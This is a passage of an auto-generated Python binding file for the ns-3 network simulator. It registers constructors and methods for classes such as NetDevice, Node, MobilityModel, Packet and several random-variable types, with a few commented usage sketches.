## ipv6-address.h (module 'network'): bool ns3::Ipv6AddressValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## ipv6-address.h (module 'network'): ns3::Ipv6Address ns3::Ipv6AddressValue::Get() const [member function]
cls.add_method('Get',
'ns3::Ipv6Address',
[],
is_const=True)
## ipv6-address.h (module 'network'): std::string ns3::Ipv6AddressValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## ipv6-address.h (module 'network'): void ns3::Ipv6AddressValue::Set(ns3::Ipv6Address const & value) [member function]
cls.add_method('Set',
'void',
[param('ns3::Ipv6Address const &', 'value')])
return
def register_Ns3Ipv6PrefixChecker_methods(root_module, cls):
## ipv6-address.h (module 'network'): ns3::Ipv6PrefixChecker::Ipv6PrefixChecker() [constructor]
cls.add_constructor([])
## ipv6-address.h (module 'network'): ns3::Ipv6PrefixChecker::Ipv6PrefixChecker(ns3::Ipv6PrefixChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Ipv6PrefixChecker const &', 'arg0')])
return
def register_Ns3Ipv6PrefixValue_methods(root_module, cls):
## ipv6-address.h (module 'network'): ns3::Ipv6PrefixValue::Ipv6PrefixValue() [constructor]
cls.add_constructor([])
## ipv6-address.h (module 'network'): ns3::Ipv6PrefixValue::Ipv6PrefixValue(ns3::Ipv6PrefixValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Ipv6PrefixValue const &', 'arg0')])
## ipv6-address.h (module 'network'): ns3::Ipv6PrefixValue::Ipv6PrefixValue(ns3::Ipv6Prefix const & value) [constructor]
cls.add_constructor([param('ns3::Ipv6Prefix const &', 'value')])
## ipv6-address.h (module 'network'): ns3::Ptr<ns3::AttributeValue> ns3::Ipv6PrefixValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## ipv6-address.h (module 'network'): bool ns3::Ipv6PrefixValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## ipv6-address.h (module 'network'): ns3::Ipv6Prefix ns3::Ipv6PrefixValue::Get() const [member function]
cls.add_method('Get',
'ns3::Ipv6Prefix',
[],
is_const=True)
## ipv6-address.h (module 'network'): std::string ns3::Ipv6PrefixValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## ipv6-address.h (module 'network'): void ns3::Ipv6PrefixValue::Set(ns3::Ipv6Prefix const & value) [member function]
cls.add_method('Set',
'void',
[param('ns3::Ipv6Prefix const &', 'value')])
return
def register_Ns3LogNormalRandomVariable_methods(root_module, cls):
## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::LogNormalRandomVariable::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## random-variable-stream.h (module 'core'): ns3::LogNormalRandomVariable::LogNormalRandomVariable() [constructor]
cls.add_constructor([])
## random-variable-stream.h (module 'core'): double ns3::LogNormalRandomVariable::GetMu() const [member function]
cls.add_method('GetMu',
'double',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::LogNormalRandomVariable::GetSigma() const [member function]
cls.add_method('GetSigma',
'double',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::LogNormalRandomVariable::GetValue(double mu, double sigma) [member function]
cls.add_method('GetValue',
'double',
[param('double', 'mu'), param('double', 'sigma')])
## random-variable-stream.h (module 'core'): uint32_t ns3::LogNormalRandomVariable::GetInteger(uint32_t mu, uint32_t sigma) [member function]
cls.add_method('GetInteger',
'uint32_t',
[param('uint32_t', 'mu'), param('uint32_t', 'sigma')])
## random-variable-stream.h (module 'core'): double ns3::LogNormalRandomVariable::GetValue() [member function]
cls.add_method('GetValue',
'double',
[],
is_virtual=True)
## random-variable-stream.h (module 'core'): uint32_t ns3::LogNormalRandomVariable::GetInteger() [member function]
cls.add_method('GetInteger',
'uint32_t',
[],
is_virtual=True)
return
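# Usage sketch for the LogNormalRandomVariable binding registered above; the
# two-argument GetValue overload takes (mu, sigma) explicitly, while the
# zero-argument overload uses the stream's configured attributes (illustrative,
# assuming the bindings are importable as 'ns3'):
#
#   rv = ns3.LogNormalRandomVariable()
#   sample = rv.GetValue(0.0, 0.25)   # draw with explicit mu/sigma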
def register_Ns3MobilityModel_methods(root_module, cls):
## mobility-model.h (module 'mobility'): ns3::MobilityModel::MobilityModel(ns3::MobilityModel const & arg0) [copy constructor]
cls.add_constructor([param('ns3::MobilityModel const &', 'arg0')])
## mobility-model.h (module 'mobility'): ns3::MobilityModel::MobilityModel() [constructor]
cls.add_constructor([])
## mobility-model.h (module 'mobility'): int64_t ns3::MobilityModel::AssignStreams(int64_t stream) [member function]
cls.add_method('AssignStreams',
'int64_t',
[param('int64_t', 'stream')])
## mobility-model.h (module 'mobility'): double ns3::MobilityModel::GetDistanceFrom(ns3::Ptr<const ns3::MobilityModel> position) const [member function]
cls.add_method('GetDistanceFrom',
'double',
[param('ns3::Ptr< ns3::MobilityModel const >', 'position')],
is_const=True)
## mobility-model.h (module 'mobility'): ns3::Vector ns3::MobilityModel::GetPosition() const [member function]
cls.add_method('GetPosition',
'ns3::Vector',
[],
is_const=True)
## mobility-model.h (module 'mobility'): double ns3::MobilityModel::GetRelativeSpeed(ns3::Ptr<const ns3::MobilityModel> other) const [member function]
cls.add_method('GetRelativeSpeed',
'double',
[param('ns3::Ptr< ns3::MobilityModel const >', 'other')],
is_const=True)
## mobility-model.h (module 'mobility'): static ns3::TypeId ns3::MobilityModel::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## mobility-model.h (module 'mobility'): ns3::Vector ns3::MobilityModel::GetVelocity() const [member function]
cls.add_method('GetVelocity',
'ns3::Vector',
[],
is_const=True)
## mobility-model.h (module 'mobility'): void ns3::MobilityModel::SetPosition(ns3::Vector const & position) [member function]
cls.add_method('SetPosition',
'void',
[param('ns3::Vector const &', 'position')])
## mobility-model.h (module 'mobility'): void ns3::MobilityModel::NotifyCourseChange() const [member function]
cls.add_method('NotifyCourseChange',
'void',
[],
is_const=True, visibility='protected')
## mobility-model.h (module 'mobility'): int64_t ns3::MobilityModel::DoAssignStreams(int64_t start) [member function]
cls.add_method('DoAssignStreams',
'int64_t',
[param('int64_t', 'start')],
visibility='private', is_virtual=True)
## mobility-model.h (module 'mobility'): ns3::Vector ns3::MobilityModel::DoGetPosition() const [member function]
cls.add_method('DoGetPosition',
'ns3::Vector',
[],
is_pure_virtual=True, is_const=True, visibility='private', is_virtual=True)
## mobility-model.h (module 'mobility'): ns3::Vector ns3::MobilityModel::DoGetVelocity() const [member function]
cls.add_method('DoGetVelocity',
'ns3::Vector',
[],
is_pure_virtual=True, is_const=True, visibility='private', is_virtual=True)
## mobility-model.h (module 'mobility'): void ns3::MobilityModel::DoSetPosition(ns3::Vector const & position) [member function]
cls.add_method('DoSetPosition',
'void',
[param('ns3::Vector const &', 'position')],
is_pure_virtual=True, visibility='private', is_virtual=True)
return
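# MobilityModel is an abstract base here (DoGetPosition/DoGetVelocity/DoSetPosition
# are pure virtual), so the calls below assume 'mob' is a concrete subclass instance,
# e.g. a ConstantPositionMobilityModel aggregated to a node (illustrative only):
#
#   mob.SetPosition(ns3.Vector(10.0, 0.0, -50.0))
#   pos = mob.GetPosition()            # -> ns3.Vector
#   d = mob.GetDistanceFrom(otherMob)  # distance to another model, in meters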
def register_Ns3NetDevice_methods(root_module, cls):
## net-device.h (module 'network'): ns3::NetDevice::NetDevice() [constructor]
cls.add_constructor([])
## net-device.h (module 'network'): ns3::NetDevice::NetDevice(ns3::NetDevice const & arg0) [copy constructor]
cls.add_constructor([param('ns3::NetDevice const &', 'arg0')])
## net-device.h (module 'network'): void ns3::NetDevice::AddLinkChangeCallback(ns3::Callback<void, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> callback) [member function]
cls.add_method('AddLinkChangeCallback',
'void',
[param('ns3::Callback< void, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'callback')],
is_pure_virtual=True, is_virtual=True)
## net-device.h (module 'network'): ns3::Address ns3::NetDevice::GetAddress() const [member function]
cls.add_method('GetAddress',
'ns3::Address',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## net-device.h (module 'network'): ns3::Address ns3::NetDevice::GetBroadcast() const [member function]
cls.add_method('GetBroadcast',
'ns3::Address',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## net-device.h (module 'network'): ns3::Ptr<ns3::Channel> ns3::NetDevice::GetChannel() const [member function]
cls.add_method('GetChannel',
'ns3::Ptr< ns3::Channel >',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## net-device.h (module 'network'): uint32_t ns3::NetDevice::GetIfIndex() const [member function]
cls.add_method('GetIfIndex',
'uint32_t',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## net-device.h (module 'network'): uint16_t ns3::NetDevice::GetMtu() const [member function]
cls.add_method('GetMtu',
'uint16_t',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## net-device.h (module 'network'): ns3::Address ns3::NetDevice::GetMulticast(ns3::Ipv4Address multicastGroup) const [member function]
cls.add_method('GetMulticast',
'ns3::Address',
[param('ns3::Ipv4Address', 'multicastGroup')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## net-device.h (module 'network'): ns3::Address ns3::NetDevice::GetMulticast(ns3::Ipv6Address addr) const [member function]
cls.add_method('GetMulticast',
'ns3::Address',
[param('ns3::Ipv6Address', 'addr')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## net-device.h (module 'network'): ns3::Ptr<ns3::Node> ns3::NetDevice::GetNode() const [member function]
cls.add_method('GetNode',
'ns3::Ptr< ns3::Node >',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## net-device.h (module 'network'): static ns3::TypeId ns3::NetDevice::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## net-device.h (module 'network'): bool ns3::NetDevice::IsBridge() const [member function]
cls.add_method('IsBridge',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## net-device.h (module 'network'): bool ns3::NetDevice::IsBroadcast() const [member function]
cls.add_method('IsBroadcast',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## net-device.h (module 'network'): bool ns3::NetDevice::IsLinkUp() const [member function]
cls.add_method('IsLinkUp',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## net-device.h (module 'network'): bool ns3::NetDevice::IsMulticast() const [member function]
cls.add_method('IsMulticast',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## net-device.h (module 'network'): bool ns3::NetDevice::IsPointToPoint() const [member function]
cls.add_method('IsPointToPoint',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## net-device.h (module 'network'): bool ns3::NetDevice::NeedsArp() const [member function]
cls.add_method('NeedsArp',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## net-device.h (module 'network'): bool ns3::NetDevice::Send(ns3::Ptr<ns3::Packet> packet, ns3::Address const & dest, uint16_t protocolNumber) [member function]
cls.add_method('Send',
'bool',
[param('ns3::Ptr< ns3::Packet >', 'packet'), param('ns3::Address const &', 'dest'), param('uint16_t', 'protocolNumber')],
is_pure_virtual=True, is_virtual=True)
## net-device.h (module 'network'): bool ns3::NetDevice::SendFrom(ns3::Ptr<ns3::Packet> packet, ns3::Address const & source, ns3::Address const & dest, uint16_t protocolNumber) [member function]
cls.add_method('SendFrom',
'bool',
[param('ns3::Ptr< ns3::Packet >', 'packet'), param('ns3::Address const &', 'source'), param('ns3::Address const &', 'dest'), param('uint16_t', 'protocolNumber')],
is_pure_virtual=True, is_virtual=True)
## net-device.h (module 'network'): void ns3::NetDevice::SetAddress(ns3::Address address) [member function]
cls.add_method('SetAddress',
'void',
[param('ns3::Address', 'address')],
is_pure_virtual=True, is_virtual=True)
## net-device.h (module 'network'): void ns3::NetDevice::SetIfIndex(uint32_t const index) [member function]
cls.add_method('SetIfIndex',
'void',
[param('uint32_t const', 'index')],
is_pure_virtual=True, is_virtual=True)
## net-device.h (module 'network'): bool ns3::NetDevice::SetMtu(uint16_t const mtu) [member function]
cls.add_method('SetMtu',
'bool',
[param('uint16_t const', 'mtu')],
is_pure_virtual=True, is_virtual=True)
## net-device.h (module 'network'): void ns3::NetDevice::SetNode(ns3::Ptr<ns3::Node> node) [member function]
cls.add_method('SetNode',
'void',
[param('ns3::Ptr< ns3::Node >', 'node')],
is_pure_virtual=True, is_virtual=True)
## net-device.h (module 'network'): void ns3::NetDevice::SetPromiscReceiveCallback(ns3::Callback<bool,ns3::Ptr<ns3::NetDevice>,ns3::Ptr<const ns3::Packet>,short unsigned int,const ns3::Address&,const ns3::Address&,ns3::NetDevice::PacketType,ns3::empty,ns3::empty,ns3::empty> cb) [member function]
cls.add_method('SetPromiscReceiveCallback',
'void',
[param('ns3::Callback< bool, ns3::Ptr< ns3::NetDevice >, ns3::Ptr< ns3::Packet const >, short unsigned int, ns3::Address const &, ns3::Address const &, ns3::NetDevice::PacketType, ns3::empty, ns3::empty, ns3::empty >', 'cb')],
is_pure_virtual=True, is_virtual=True)
## net-device.h (module 'network'): void ns3::NetDevice::SetReceiveCallback(ns3::Callback<bool, ns3::Ptr<ns3::NetDevice>, ns3::Ptr<ns3::Packet const>, unsigned short, ns3::Address const&, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> cb) [member function]
cls.add_method('SetReceiveCallback',
'void',
[param('ns3::Callback< bool, ns3::Ptr< ns3::NetDevice >, ns3::Ptr< ns3::Packet const >, unsigned short, ns3::Address const &, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'cb')],
is_pure_virtual=True, is_virtual=True)
## net-device.h (module 'network'): bool ns3::NetDevice::SupportsSendFrom() const [member function]
cls.add_method('SupportsSendFrom',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3NixVector_methods(root_module, cls):
cls.add_output_stream_operator()
## nix-vector.h (module 'network'): ns3::NixVector::NixVector() [constructor]
cls.add_constructor([])
## nix-vector.h (module 'network'): ns3::NixVector::NixVector(ns3::NixVector const & o) [copy constructor]
cls.add_constructor([param('ns3::NixVector const &', 'o')])
## nix-vector.h (module 'network'): void ns3::NixVector::AddNeighborIndex(uint32_t newBits, uint32_t numberOfBits) [member function]
cls.add_method('AddNeighborIndex',
'void',
[param('uint32_t', 'newBits'), param('uint32_t', 'numberOfBits')])
## nix-vector.h (module 'network'): uint32_t ns3::NixVector::BitCount(uint32_t numberOfNeighbors) const [member function]
cls.add_method('BitCount',
'uint32_t',
[param('uint32_t', 'numberOfNeighbors')],
is_const=True)
## nix-vector.h (module 'network'): ns3::Ptr<ns3::NixVector> ns3::NixVector::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::NixVector >',
[],
is_const=True)
## nix-vector.h (module 'network'): uint32_t ns3::NixVector::Deserialize(uint32_t const * buffer, uint32_t size) [member function]
cls.add_method('Deserialize',
'uint32_t',
[param('uint32_t const *', 'buffer'), param('uint32_t', 'size')])
## nix-vector.h (module 'network'): uint32_t ns3::NixVector::ExtractNeighborIndex(uint32_t numberOfBits) [member function]
cls.add_method('ExtractNeighborIndex',
'uint32_t',
[param('uint32_t', 'numberOfBits')])
## nix-vector.h (module 'network'): uint32_t ns3::NixVector::GetRemainingBits() [member function]
cls.add_method('GetRemainingBits',
'uint32_t',
[])
## nix-vector.h (module 'network'): uint32_t ns3::NixVector::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_const=True)
## nix-vector.h (module 'network'): uint32_t ns3::NixVector::Serialize(uint32_t * buffer, uint32_t maxSize) const [member function]
cls.add_method('Serialize',
'uint32_t',
[param('uint32_t *', 'buffer'), param('uint32_t', 'maxSize')],
is_const=True)
return
def register_Ns3Node_methods(root_module, cls):
## node.h (module 'network'): ns3::Node::Node(ns3::Node const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Node const &', 'arg0')])
## node.h (module 'network'): ns3::Node::Node() [constructor]
cls.add_constructor([])
## node.h (module 'network'): ns3::Node::Node(uint32_t systemId) [constructor]
cls.add_constructor([param('uint32_t', 'systemId')])
## node.h (module 'network'): uint32_t ns3::Node::AddApplication(ns3::Ptr<ns3::Application> application) [member function]
cls.add_method('AddApplication',
'uint32_t',
[param('ns3::Ptr< ns3::Application >', 'application')])
## node.h (module 'network'): uint32_t ns3::Node::AddDevice(ns3::Ptr<ns3::NetDevice> device) [member function]
cls.add_method('AddDevice',
'uint32_t',
[param('ns3::Ptr< ns3::NetDevice >', 'device')])
## node.h (module 'network'): static bool ns3::Node::ChecksumEnabled() [member function]
cls.add_method('ChecksumEnabled',
'bool',
[],
is_static=True)
## node.h (module 'network'): ns3::Ptr<ns3::Application> ns3::Node::GetApplication(uint32_t index) const [member function]
cls.add_method('GetApplication',
'ns3::Ptr< ns3::Application >',
[param('uint32_t', 'index')],
is_const=True)
## node.h (module 'network'): ns3::Ptr<ns3::NetDevice> ns3::Node::GetDevice(uint32_t index) const [member function]
cls.add_method('GetDevice',
'ns3::Ptr< ns3::NetDevice >',
[param('uint32_t', 'index')],
is_const=True)
## node.h (module 'network'): uint32_t ns3::Node::GetId() const [member function]
cls.add_method('GetId',
'uint32_t',
[],
is_const=True)
## node.h (module 'network'): uint32_t ns3::Node::GetNApplications() const [member function]
cls.add_method('GetNApplications',
'uint32_t',
[],
is_const=True)
## node.h (module 'network'): uint32_t ns3::Node::GetNDevices() const [member function]
cls.add_method('GetNDevices',
'uint32_t',
[],
is_const=True)
## node.h (module 'network'): uint32_t ns3::Node::GetSystemId() const [member function]
cls.add_method('GetSystemId',
'uint32_t',
[],
is_const=True)
## node.h (module 'network'): static ns3::TypeId ns3::Node::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## node.h (module 'network'): void ns3::Node::RegisterDeviceAdditionListener(ns3::Callback<void,ns3::Ptr<ns3::NetDevice>,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> listener) [member function]
cls.add_method('RegisterDeviceAdditionListener',
'void',
[param('ns3::Callback< void, ns3::Ptr< ns3::NetDevice >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'listener')])
## node.h (module 'network'): void ns3::Node::RegisterProtocolHandler(ns3::Callback<void, ns3::Ptr<ns3::NetDevice>, ns3::Ptr<ns3::Packet const>, unsigned short, ns3::Address const&, ns3::Address const&, ns3::NetDevice::PacketType, ns3::empty, ns3::empty, ns3::empty> handler, uint16_t protocolType, ns3::Ptr<ns3::NetDevice> device, bool promiscuous=false) [member function]
cls.add_method('RegisterProtocolHandler',
'void',
[param('ns3::Callback< void, ns3::Ptr< ns3::NetDevice >, ns3::Ptr< ns3::Packet const >, unsigned short, ns3::Address const &, ns3::Address const &, ns3::NetDevice::PacketType, ns3::empty, ns3::empty, ns3::empty >', 'handler'), param('uint16_t', 'protocolType'), param('ns3::Ptr< ns3::NetDevice >', 'device'), param('bool', 'promiscuous', default_value='false')])
## node.h (module 'network'): void ns3::Node::UnregisterDeviceAdditionListener(ns3::Callback<void,ns3::Ptr<ns3::NetDevice>,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> listener) [member function]
cls.add_method('UnregisterDeviceAdditionListener',
'void',
[param('ns3::Callback< void, ns3::Ptr< ns3::NetDevice >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'listener')])
## node.h (module 'network'): void ns3::Node::UnregisterProtocolHandler(ns3::Callback<void, ns3::Ptr<ns3::NetDevice>, ns3::Ptr<ns3::Packet const>, unsigned short, ns3::Address const&, ns3::Address const&, ns3::NetDevice::PacketType, ns3::empty, ns3::empty, ns3::empty> handler) [member function]
cls.add_method('UnregisterProtocolHandler',
'void',
[param('ns3::Callback< void, ns3::Ptr< ns3::NetDevice >, ns3::Ptr< ns3::Packet const >, unsigned short, ns3::Address const &, ns3::Address const &, ns3::NetDevice::PacketType, ns3::empty, ns3::empty, ns3::empty >', 'handler')])
## node.h (module 'network'): void ns3::Node::DoDispose() [member function]
cls.add_method('DoDispose',
'void',
[],
visibility='protected', is_virtual=True)
## node.h (module 'network'): void ns3::Node::DoStart() [member function]
cls.add_method('DoStart',
'void',
[],
visibility='protected', is_virtual=True)
return
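# Usage sketch for the Node binding registered above (illustrative; 'dev' and 'app'
# stand for previously constructed NetDevice/Application objects):
#
#   node = ns3.Node()
#   ifIndex = node.AddDevice(dev)      # returns the device's index on this node
#   node.AddApplication(app)
#   n = node.GetNDevices()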
def register_Ns3NormalRandomVariable_methods(root_module, cls):
## random-variable-stream.h (module 'core'): ns3::NormalRandomVariable::INFINITE_VALUE [variable]
cls.add_static_attribute('INFINITE_VALUE', 'double const', is_const=True)
## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::NormalRandomVariable::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## random-variable-stream.h (module 'core'): ns3::NormalRandomVariable::NormalRandomVariable() [constructor]
cls.add_constructor([])
## random-variable-stream.h (module 'core'): double ns3::NormalRandomVariable::GetMean() const [member function]
cls.add_method('GetMean',
'double',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::NormalRandomVariable::GetVariance() const [member function]
cls.add_method('GetVariance',
'double',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::NormalRandomVariable::GetBound() const [member function]
cls.add_method('GetBound',
'double',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::NormalRandomVariable::GetValue(double mean, double variance, double bound=ns3::NormalRandomVariable::INFINITE_VALUE) [member function]
cls.add_method('GetValue',
'double',
[param('double', 'mean'), param('double', 'variance'), param('double', 'bound', default_value='ns3::NormalRandomVariable::INFINITE_VALUE')])
## random-variable-stream.h (module 'core'): uint32_t ns3::NormalRandomVariable::GetInteger(uint32_t mean, uint32_t variance, uint32_t bound) [member function]
cls.add_method('GetInteger',
'uint32_t',
[param('uint32_t', 'mean'), param('uint32_t', 'variance'), param('uint32_t', 'bound')])
## random-variable-stream.h (module 'core'): double ns3::NormalRandomVariable::GetValue() [member function]
cls.add_method('GetValue',
'double',
[],
is_virtual=True)
## random-variable-stream.h (module 'core'): uint32_t ns3::NormalRandomVariable::GetInteger() [member function]
cls.add_method('GetInteger',
'uint32_t',
[],
is_virtual=True)
return
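# Usage sketch for the NormalRandomVariable binding registered above; 'bound'
# defaults to NormalRandomVariable::INFINITE_VALUE, i.e. the draw is not truncated
# (illustrative only):
#
#   nrv = ns3.NormalRandomVariable()
#   x = nrv.GetValue(5.0, 2.0)         # mean = 5.0, variance = 2.0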
def register_Ns3ObjectFactoryChecker_methods(root_module, cls):
## object-factory.h (module 'core'): ns3::ObjectFactoryChecker::ObjectFactoryChecker() [constructor]
cls.add_constructor([])
## object-factory.h (module 'core'): ns3::ObjectFactoryChecker::ObjectFactoryChecker(ns3::ObjectFactoryChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ObjectFactoryChecker const &', 'arg0')])
return
def register_Ns3ObjectFactoryValue_methods(root_module, cls):
## object-factory.h (module 'core'): ns3::ObjectFactoryValue::ObjectFactoryValue() [constructor]
cls.add_constructor([])
## object-factory.h (module 'core'): ns3::ObjectFactoryValue::ObjectFactoryValue(ns3::ObjectFactoryValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ObjectFactoryValue const &', 'arg0')])
## object-factory.h (module 'core'): ns3::ObjectFactoryValue::ObjectFactoryValue(ns3::ObjectFactory const & value) [constructor]
cls.add_constructor([param('ns3::ObjectFactory const &', 'value')])
## object-factory.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::ObjectFactoryValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## object-factory.h (module 'core'): bool ns3::ObjectFactoryValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## object-factory.h (module 'core'): ns3::ObjectFactory ns3::ObjectFactoryValue::Get() const [member function]
cls.add_method('Get',
'ns3::ObjectFactory',
[],
is_const=True)
## object-factory.h (module 'core'): std::string ns3::ObjectFactoryValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## object-factory.h (module 'core'): void ns3::ObjectFactoryValue::Set(ns3::ObjectFactory const & value) [member function]
cls.add_method('Set',
'void',
[param('ns3::ObjectFactory const &', 'value')])
return
def register_Ns3Packet_methods(root_module, cls):
cls.add_output_stream_operator()
## packet.h (module 'network'): ns3::Packet::Packet() [constructor]
cls.add_constructor([])
## packet.h (module 'network'): ns3::Packet::Packet(ns3::Packet const & o) [copy constructor]
cls.add_constructor([param('ns3::Packet const &', 'o')])
## packet.h (module 'network'): ns3::Packet::Packet(uint32_t size) [constructor]
cls.add_constructor([param('uint32_t', 'size')])
## packet.h (module 'network'): ns3::Packet::Packet(uint8_t const * buffer, uint32_t size, bool magic) [constructor]
cls.add_constructor([param('uint8_t const *', 'buffer'), param('uint32_t', 'size'), param('bool', 'magic')])
## packet.h (module 'network'): ns3::Packet::Packet(uint8_t const * buffer, uint32_t size) [constructor]
cls.add_constructor([param('uint8_t const *', 'buffer'), param('uint32_t', 'size')])
## packet.h (module 'network'): void ns3::Packet::AddAtEnd(ns3::Ptr<const ns3::Packet> packet) [member function]
cls.add_method('AddAtEnd',
'void',
[param('ns3::Ptr< ns3::Packet const >', 'packet')])
## packet.h (module 'network'): void ns3::Packet::AddByteTag(ns3::Tag const & tag) const [member function]
cls.add_method('AddByteTag',
'void',
[param('ns3::Tag const &', 'tag')],
is_const=True)
## packet.h (module 'network'): void ns3::Packet::AddHeader(ns3::Header const & header) [member function]
cls.add_method('AddHeader',
'void',
[param('ns3::Header const &', 'header')])
## packet.h (module 'network'): void ns3::Packet::AddPacketTag(ns3::Tag const & tag) const [member function]
cls.add_method('AddPacketTag',
'void',
[param('ns3::Tag const &', 'tag')],
is_const=True)
## packet.h (module 'network'): void ns3::Packet::AddPaddingAtEnd(uint32_t size) [member function]
cls.add_method('AddPaddingAtEnd',
'void',
[param('uint32_t', 'size')])
## packet.h (module 'network'): void ns3::Packet::AddTrailer(ns3::Trailer const & trailer) [member function]
cls.add_method('AddTrailer',
'void',
[param('ns3::Trailer const &', 'trailer')])
## packet.h (module 'network'): ns3::PacketMetadata::ItemIterator ns3::Packet::BeginItem() const [member function]
cls.add_method('BeginItem',
'ns3::PacketMetadata::ItemIterator',
[],
is_const=True)
## packet.h (module 'network'): ns3::Ptr<ns3::Packet> ns3::Packet::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::Packet >',
[],
is_const=True)
## packet.h (module 'network'): uint32_t ns3::Packet::CopyData(uint8_t * buffer, uint32_t size) const [member function]
cls.add_method('CopyData',
'uint32_t',
[param('uint8_t *', 'buffer'), param('uint32_t', 'size')],
is_const=True)
## packet.h (module 'network'): void ns3::Packet::CopyData(std::ostream * os, uint32_t size) const [member function]
cls.add_method('CopyData',
'void',
[param('std::ostream *', 'os'), param('uint32_t', 'size')],
is_const=True)
## packet.h (module 'network'): ns3::Ptr<ns3::Packet> ns3::Packet::CreateFragment(uint32_t start, uint32_t length) const [member function]
cls.add_method('CreateFragment',
'ns3::Ptr< ns3::Packet >',
[param('uint32_t', 'start'), param('uint32_t', 'length')],
is_const=True)
## packet.h (module 'network'): static void ns3::Packet::EnableChecking() [member function]
cls.add_method('EnableChecking',
'void',
[],
is_static=True)
## packet.h (module 'network'): static void ns3::Packet::EnablePrinting() [member function]
cls.add_method('EnablePrinting',
'void',
[],
is_static=True)
## packet.h (module 'network'): bool ns3::Packet::FindFirstMatchingByteTag(ns3::Tag & tag) const [member function]
cls.add_method('FindFirstMatchingByteTag',
'bool',
[param('ns3::Tag &', 'tag')],
is_const=True)
## packet.h (module 'network'): ns3::ByteTagIterator ns3::Packet::GetByteTagIterator() const [member function]
cls.add_method('GetByteTagIterator',
'ns3::ByteTagIterator',
[],
is_const=True)
## packet.h (module 'network'): ns3::Ptr<ns3::NixVector> ns3::Packet::GetNixVector() const [member function]
cls.add_method('GetNixVector',
'ns3::Ptr< ns3::NixVector >',
[],
is_const=True)
## packet.h (module 'network'): ns3::PacketTagIterator ns3::Packet::GetPacketTagIterator() const [member function]
cls.add_method('GetPacketTagIterator',
'ns3::PacketTagIterator',
[],
is_const=True)
